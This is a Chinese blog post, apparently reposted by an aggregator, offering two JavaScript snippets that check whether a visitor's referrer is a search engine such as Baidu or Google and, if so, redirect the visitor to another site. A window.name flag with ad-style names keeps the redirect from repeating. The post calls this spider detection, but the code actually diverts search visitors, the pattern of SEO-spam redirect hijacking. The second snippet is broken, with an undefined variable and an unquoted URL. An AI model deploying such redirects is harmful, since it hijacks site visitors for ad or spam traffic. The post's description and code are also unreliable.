js如何判断访问来源是来自搜索引擎(蜘蛛人)还是直接访问

Posted 歉信君 —— 信真科技·信守真品 www.xinzhenkj

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了js如何判断访问来源是来自搜索引擎(蜘蛛人)还是直接访问相关的知识,希望对你有一定的参考价值。

以下javascript脚本代码可以实现判断访问是否来自搜索引擎。
代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<script type="text/javascript">
if(window.name != ‘ad_app6‘){
var r = document.referrer;
r = r.toLowerCase(); //转为小写
var aSites = new Array(‘google.‘,‘baidu.‘,‘soso.‘,‘so.‘,‘360.‘,‘yahoo.‘,‘youdao.‘,‘sogou.‘,‘gougou.‘);
var b = false;
for (i in aSites){
if (r.indexOf(aSites[i]) > 0){
b = true;
break;
}
}
  
if(b)
{
self.location = ‘要跳转的网址‘;
window.adworkergo = ‘ad_app6‘;
}
}
</script>

介绍的这个JS判断蜘蛛来源的方法脚本是写在body的onload里面的。即页面加载时进行判断。代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
body {onload:expression(
if(window.name!="Yang"){
var str1 = document.referrer;
str1 = str1.toLowerCase();
var str6 = ‘google.‘;
var str7 = ‘baidu.‘;
var str4 = ‘yahoo.‘;
var str8 = ‘youdao.‘;
var str9 = ‘sogou.‘;
var str5 = ‘soso.‘;
if(str1.indexOf(str7)>0 || str1.indexOf(str6)>0 || str1.indexOf(str4)>0 || str1.indexOf(str3)>0 || str1.indexOf(str8)>0 || str1.indexOf(str9)
  
>0 || str1.indexOf(str5)>0 && "zh-cn"==navigator.systemLanguage)
{
self.location=http://www.abc.com/;
window.name="Yang";
}
  
}
);}

这个JS判断蜘蛛来源方法不太好用。特别是在需要判断更多蜘蛛来源时代码写起来比较麻烦。


以上是关于js如何判断访问来源是来自搜索引擎(蜘蛛人)还是直接访问的主要内容,如果未能解决你的问题,请参考以下文章

判断访问者是否为搜索引擎蜘蛛

nginx里面如何判断一个请求是来自局域网还是外网

Ruby on Rails,如何确定请求是由机器人还是搜索引擎蜘蛛制作的?

SEO如何辨别真假Baiduspider

js如何判断用户是在pc端和还是移动端访问

js 判断是手机访问,还是pc访问